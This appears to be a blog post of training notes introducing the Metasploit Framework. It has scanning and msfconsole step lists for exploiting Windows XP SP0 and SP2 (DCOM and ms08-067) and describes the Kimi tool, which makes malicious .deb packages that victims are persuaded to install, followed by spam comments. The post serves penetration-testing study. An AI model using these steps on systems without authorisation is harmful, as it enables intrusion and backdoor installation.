Introduction of Metasploit Framework part one

Grade 2
=======
Session 7
———
Console Based Exploitation 1 —> Windows XP SP 0
Console Based Exploitation 2 —> Windows XP SP 2
Kimi Framework

Terminologies
=============
1. Vulnerabilities
2. Exploit
3. Payload
4. Backdoor
5. Covering Traces

Terms
=====
RHOST –> Remote Host —> Target’s IP Address
RPORT –> Remote Port –> The port number of target machine on which a vulnerable service is running
LHOST –> Listening Host –> Attacker’s IP Address
LPORT –> Listening Port –> The port number on which an attacker is listening

EXPLOIT – 1
———–
Reuirements
XP Service Pack 0
Kali Linux —> Updates
Metasploit Framework

Steps:
——
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
search dcom
5. use <path of the above exploit>
6. show info –> information of the exploit
7. show options –> to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit

EXPLOIT – 2
———–
Reuirements
XP Service Pack 2
Kali Linux —> Updates
Metasploit Framework

Steps:
——
1. nmap -sS -sC -sV <IP Address>
2. nmap -A -T4 <IP Address>
3. msfconsole
4. search the corresponding exploit
search ms08-067/netapi
5. use <path of the above exploit>
6. show info –> information of the exploit
7. show options –> to show the options of the exploit
8. set RHOST <target IP Address>
9. show options
10. exploit

KiMi Framework
==============
It is a framework for exploiting linux based OS. It is named after a character of Naruto –> Kimimaro. In this framework, we create a malicious file of extension .deb —> debian file extension. We ask the target to install that debian package. as soon as the target install the debian package, we will receive a meterpreter session.
We need to download this framework from github
https://github.com/ChaitanyaHaritash/kimi
Clone or copy —> click
Copy the link
Open the linux teminal and type
#git clone https://github.com/ChaitanyaHaritash/kimi.git
#cd kimi
#python kimi.py -h —–> help page

https://www.offensive-security.com/metasploit-unleashed/

https://pastebin.com/QKYtXps6

3 comments on “Introduction of Metasploit Framework part one
  1. You made some good points there. I did a search on the topic and found most individuals will go along with with your blog.

  2. Great line up. We will be linking to this great article on our site. Keep up the good writing.

  3. Rocio Udley says:

    You made some good points there. I did a search on the matter and found most persons will consent with your blog.

Leave a Reply

Your email address will not be published. Required fields are marked *

*